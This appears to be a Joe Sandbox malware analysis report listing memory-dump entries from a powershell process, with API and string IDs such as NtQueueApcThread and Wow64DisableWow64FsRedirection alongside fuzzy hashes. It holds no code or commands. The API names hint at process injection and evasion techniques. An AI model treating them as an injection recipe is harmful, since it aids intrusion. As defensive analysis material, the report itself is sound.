                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: NtQueueApcThread$ntdll
                                                                                        • API String ID: 1646373207-1374908105
                                                                                        • Opcode ID: 2536bb9452705a2f6e7169ceafa1b416df13a56cc0cf1ef56e7307e0eec9c158
                                                                                        • Instruction ID: af74e6041dff795f6b8433c71fb48326a09d85dbcfd9c41e0fb89c35cbe76a95
                                                                                        • Opcode Fuzzy Hash: 2536bb9452705a2f6e7169ceafa1b416df13a56cc0cf1ef56e7307e0eec9c158
                                                                                        • Instruction Fuzzy Hash: 38018F3D311B42C2EA10CB5AF94429EB3A0FBA7BD0F984521DE6947B55DF38C45A8300
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: IsWow64Process$kernel32
                                                                                        • API String ID: 1646373207-3789238822
                                                                                        • Opcode ID: ec429c199b0f6375f9f9bb3acfabef0345e96e1c9904636b59857b424156df6f
                                                                                        • Instruction ID: 1909f68f526ea326621795fae9be9e267615f45e10323d13370f034c8982bf16
                                                                                        • Opcode Fuzzy Hash: ec429c199b0f6375f9f9bb3acfabef0345e96e1c9904636b59857b424156df6f
                                                                                        • Instruction Fuzzy Hash: 17E09278332601C2EE14CB19E9847996350EBA7780F4C1010995B4A2A1EF2CC98DCB01
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32
                                                                                        • API String ID: 1646373207-3900151262
                                                                                        • Opcode ID: 319746fa707029ab9a73eb8f742d9554a97dfc1dcddc658422bf1e3b845b0c79
                                                                                        • Instruction ID: 8cb9f7aa408839f5593be2530399b63a53810eeadc0b1c7d0324ab672d78c4b0
                                                                                        • Opcode Fuzzy Hash: 319746fa707029ab9a73eb8f742d9554a97dfc1dcddc658422bf1e3b845b0c79
                                                                                        • Instruction Fuzzy Hash: DFD05E3C723605C1FE29DB9ABE446EC2350AB6BF80F4D1060882A0A360EE2CC18EC311
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32
                                                                                        • API String ID: 1646373207-736604160
                                                                                        • Opcode ID: ee7ac246b15703f1bae1af517107d06ce80ae1fd60a4afa284d23f3dc5206b46
                                                                                        • Instruction ID: d8a3addac39547978a44f971786736394bedef7dba7731e7129466814992cf38
                                                                                        • Opcode Fuzzy Hash: ee7ac246b15703f1bae1af517107d06ce80ae1fd60a4afa284d23f3dc5206b46
                                                                                        • Instruction Fuzzy Hash: D2D05B3C733605C1FD25D755BD446DC63509B6BB80F4D1061882D06350DE2CC18EC311
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1dde0bc93da3cc204cab392ef88660b8feabc790641522e6986fd432b01f6e40
                                                                                        • Instruction ID: 31f5dcd762ae6c781794c54052554a73d6cc4306ece4a8b039b24d36e042d8bf
                                                                                        • Opcode Fuzzy Hash: 1dde0bc93da3cc204cab392ef88660b8feabc790641522e6986fd432b01f6e40
                                                                                        • Instruction Fuzzy Hash: B761C27DB03640CAE794CF1DE5553E832A0F77BB99F2C4529DA05573A1CB3AC44A8B82
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1dde0bc93da3cc204cab392ef88660b8feabc790641522e6986fd432b01f6e40
                                                                                        • Instruction ID: c08de2137109a1271946f73b16f9e63e2bbf336df8a45c9f96602de3a53317b6
                                                                                        • Opcode Fuzzy Hash: 1dde0bc93da3cc204cab392ef88660b8feabc790641522e6986fd432b01f6e40
                                                                                        • Instruction Fuzzy Hash: DC61697A343A40E6E754CB1CE8453EA33A0E77BB55F2C4129D9194B7E5CB3AC44ACB42
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: strchr$_snprintfmalloc$_errno_invalid_parameter_noinforand
                                                                                        • String ID: not create token: %d
                                                                                        • API String ID: 1095232423-2272930512
                                                                                        • Opcode ID: 9f33a31cc3dbe4d390e57a8e0463a50ad11e38a52d1dbdd6b3122e58f7288ae2
                                                                                        • Instruction ID: 7a939c127dc3bbe616b2b423f78fa7738e631c01f1f06fdc4c19c9bb5caad9f9
                                                                                        • Opcode Fuzzy Hash: 9f33a31cc3dbe4d390e57a8e0463a50ad11e38a52d1dbdd6b3122e58f7288ae2
                                                                                        • Instruction Fuzzy Hash: 6541B07A305E80D5EB51DB2ED2452ECA3B1FFAAB84F085911DF4867B61DF34D1A68340
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _errno$AllocHeapNamedObjectPeekPipeSingleWait_callnewhfreehtonlmalloc
                                                                                        • String ID:
                                                                                        • API String ID: 2495333179-0
                                                                                        • Opcode ID: 92903f8e34bb86019301daba1a442a9bec2b61465fa0227abaf91983d09bc4f7
                                                                                        • Instruction ID: 1676700477183c7cfcdb4a92f1c83352ae21d53f03b6903de20116ccc0f07133
                                                                                        • Opcode Fuzzy Hash: 92903f8e34bb86019301daba1a442a9bec2b61465fa0227abaf91983d09bc4f7
                                                                                        • Instruction Fuzzy Hash: 61310A3E303A40C9E7A4DF2AA5403AD63A6FB57BC8F0D4524DE4507695DB7DC88AC346
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Timestrtok$FileSystem_getptd_time64malloc
                                                                                        • String ID:
                                                                                        • API String ID: 460628555-0
                                                                                        • Opcode ID: 2fe16f1730b9e72f7102dc70ee842add604a2edc5f5efba699c173ab423aa684
                                                                                        • Instruction ID: 0c52adc769d4be53fbe59cd098e35e74b4b843733e7c8dc0e79eb6f9e4c6d76a
                                                                                        • Opcode Fuzzy Hash: 2fe16f1730b9e72f7102dc70ee842add604a2edc5f5efba699c173ab423aa684
                                                                                        • Instruction Fuzzy Hash: 9E21E4BA702B94C1EB40CF59E0846DD77A8F367BD4F0E4265EE1A43786CB35C4468740
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
                                                                                        • String ID:
                                                                                        • API String ID: 4151157258-0
                                                                                        • Opcode ID: 89153f5c64fab27db57a2af5758249aa045b2e8adbb4ff24b9161b74b74b034e
                                                                                        • Instruction ID: 586e1a3d949c8434b0c81334732b93b34f9d2f5279e3da08de018b9fbe639124
                                                                                        • Opcode Fuzzy Hash: 89153f5c64fab27db57a2af5758249aa045b2e8adbb4ff24b9161b74b74b034e
                                                                                        • Instruction Fuzzy Hash: A92105BA30A2A4C1EBE0D61D94503FEA6D0F36BBD4F1C4123EAD617AC5E92CC5499702
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: clock
                                                                                        • String ID:
                                                                                        • API String ID: 3195780754-0
                                                                                        • Opcode ID: e2b349abe329f7009f7708ed868e84964882b604b0b8053b47ed61a3df0cf38d
                                                                                        • Instruction ID: 5202222d7e940faac7d65b26baba50b19eb89063c032d5b336d64e498e51ae5f
                                                                                        • Opcode Fuzzy Hash: e2b349abe329f7009f7708ed868e84964882b604b0b8053b47ed61a3df0cf38d
                                                                                        • Instruction Fuzzy Hash: B9112736305744C9F3B2DEBA69802ABF690F7663D0F1D4025EF4417245E934C88AC782
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
                                                                                        • String ID:
                                                                                        • API String ID: 4151157258-0
                                                                                        • Opcode ID: 981429a1da204f704ed88d261ee2d43387d2cfac4902a0026a6358d448239ec3
                                                                                        • Instruction ID: fe3a510af9eb8f59cd7b5914b9a75e6ad8c777eda87d24390b5e7e6f696a55b9
                                                                                        • Opcode Fuzzy Hash: 981429a1da204f704ed88d261ee2d43387d2cfac4902a0026a6358d448239ec3
                                                                                        • Instruction Fuzzy Hash: E721E47E70B2A0C2EB60D71D90503FDA7D0E3A3BD4F1C4121EA960BAE5DA28C4498753
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: clock
                                                                                        • String ID:
                                                                                        • API String ID: 3195780754-0
                                                                                        • Opcode ID: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
                                                                                        • Instruction ID: 990e569c8c98a8d8158bc4129d6282c89f8f7f1a3e372e4c125b3ee8e8c554c0
                                                                                        • Opcode Fuzzy Hash: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
                                                                                        • Instruction Fuzzy Hash: 30110A3AB05784C5F7B0DEAAAA406EBF790B767394F1D0131EE64537C6E974C889C602
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: free$closesocketsend$accept
                                                                                        • String ID:
                                                                                        • API String ID: 47150829-0
                                                                                        • Opcode ID: caadc6cbf8b8aa9901aecb44ddbc265dbb6e74dc9ec5a2b89a727a9022558361
                                                                                        • Instruction ID: 4859824efc7a12394865ee916314c19f93f3a581cfebf32725e3dafabe7a92b5
                                                                                        • Opcode Fuzzy Hash: caadc6cbf8b8aa9901aecb44ddbc265dbb6e74dc9ec5a2b89a727a9022558361
                                                                                        • Instruction Fuzzy Hash: 2F01B93D311940C1EB64DB3AE665BAD2361E79BFF4F0D5111DE2607785CE2DC0898B02
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick$NamedPeekPipeSleep
                                                                                        • String ID:
                                                                                        • API String ID: 1593283408-0
                                                                                        • Opcode ID: 210e21c30d6d06447862c16b29a5b20d0c0fb279467bc43041b9c33569e9406a
                                                                                        • Instruction ID: a7d5617d400169271540b527ff960935f9f62f1574bca399e1a01aa6ab9a597e
                                                                                        • Opcode Fuzzy Hash: 210e21c30d6d06447862c16b29a5b20d0c0fb279467bc43041b9c33569e9406a
                                                                                        • Instruction Fuzzy Hash: B301D639715A50C2F720CB29F80434EA2A1F79BBC1F6C4130DB9846BA4DF3DC48A8706
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick$NamedPeekPipeSleep
                                                                                        • String ID:
                                                                                        • API String ID: 1593283408-0
                                                                                        • Opcode ID: aac62254f3a365505a6a564a1f05aa253f383d98e2b7473c1e2f14b721fad9df
                                                                                        • Instruction ID: e63561c321fc1ea9b862e4f4a5af9540bd4d8e542aae5fae5f04f517b86d9eab
                                                                                        • Opcode Fuzzy Hash: aac62254f3a365505a6a564a1f05aa253f383d98e2b7473c1e2f14b721fad9df
                                                                                        • Instruction Fuzzy Hash: AD01D63A725A40C6F320CB18F44435EB761E79BBC0F684120DB8502A64DF7DC4998B05
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AttributeHeapInitializeListProcThread$AllocProcess
                                                                                        • String ID:
                                                                                        • API String ID: 1212816094-0
                                                                                        • Opcode ID: 092ee1049558447ca0759a62b312a2f8f202331ccdb130be8b8fda5f5e098b35
                                                                                        • Instruction ID: 54ba7b1bfd4b06961083674d9b3dbe1f423f5151f4621f2818daa33fbfb762e8
                                                                                        • Opcode Fuzzy Hash: 092ee1049558447ca0759a62b312a2f8f202331ccdb130be8b8fda5f5e098b35
                                                                                        • Instruction Fuzzy Hash: 34F0FC7E326640C2E754CB39A9417AE5790D79BBD0F5D5425BA4B42754CE3DC449C600
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: free$ErrorFreeHeapLast_errnoclosesocket
                                                                                        • String ID:
                                                                                        • API String ID: 1525665891-0
                                                                                        • Opcode ID: 514671407b84a75ab4a957943dd5047acaa779434bbb8d29509bbfd64e64c7a5
                                                                                        • Instruction ID: ddd2a46f96ea0c00a7d05e577b8cbb2390f017aae85e67d1db1e26e91a4f6c74
                                                                                        • Opcode Fuzzy Hash: 514671407b84a75ab4a957943dd5047acaa779434bbb8d29509bbfd64e64c7a5
                                                                                        • Instruction Fuzzy Hash: 7CE0623D711C44C1EF14EB76D8651AD1320E7ABFDDF1C00219E5E472A6CE59C45AC346
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                                                                                        • String ID: B
                                                                                        • API String ID: 1812809483-1255198513
                                                                                        • Opcode ID: 60c63a2ab9f2c694e46ab874add7d0a6eb48e0963f6941f66a4f1d1620c6c169
                                                                                        • Instruction ID: 06ee4a143bcf898511dfa7916f60dfe10993e83956c90ab5885e15cc11a86220
                                                                                        • Opcode Fuzzy Hash: 60c63a2ab9f2c694e46ab874add7d0a6eb48e0963f6941f66a4f1d1620c6c169
                                                                                        • Instruction Fuzzy Hash: 2B118E76715A44C6EB10DB1AD44039DB661F7AAFE4F684320AB5857BD6DF38C148CB01
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                                                                                        • String ID: B
                                                                                        • API String ID: 1812809483-1255198513
                                                                                        • Opcode ID: c02d2d703cad3fde31994e70e132d1470a84cf0b2fdde3fa0011d2dc5e3ae6ea
                                                                                        • Instruction ID: 28f9ece0b15bcea73681a77f45a64d759ac8bb55bcc81038cdc506d98e250304
                                                                                        • Opcode Fuzzy Hash: c02d2d703cad3fde31994e70e132d1470a84cf0b2fdde3fa0011d2dc5e3ae6ea
                                                                                        • Instruction Fuzzy Hash: 53117C7A715A40C6EB10DB56E444399B7A1F7AABE4F684221AB580BB95CB38C149CB01
                                                                                        APIs
                                                                                        Memory Dump Source
